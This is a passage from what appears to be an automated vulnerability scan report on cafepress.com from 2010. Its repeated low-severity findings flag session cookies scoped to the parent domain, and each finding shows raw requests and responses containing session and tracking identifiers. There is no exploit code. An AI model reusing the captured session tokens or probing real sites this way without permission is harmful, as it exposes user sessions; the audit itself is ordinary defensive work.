__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 58677
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.7. http://www.cafepress.com/+baby-bodysuits previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-bodysuits

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59167
Date: Sun, 26 Dec 2010 13:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.8. http://www.cafepress.com/+baby-hat previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-hat

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58517
Date: Sun, 26 Dec 2010 13:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.9. http://www.cafepress.com/+bags previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+bags

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59533
Date: Sun, 26 Dec 2010 13:46:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.10. http://www.cafepress.com/+boxers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+boxers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59426
Date: Sun, 26 Dec 2010 13:47:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.11. http://www.cafepress.com/+bumper-stickers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+bumper-stickers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59721
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.12. http://www.cafepress.com/+buttons previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+buttons

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
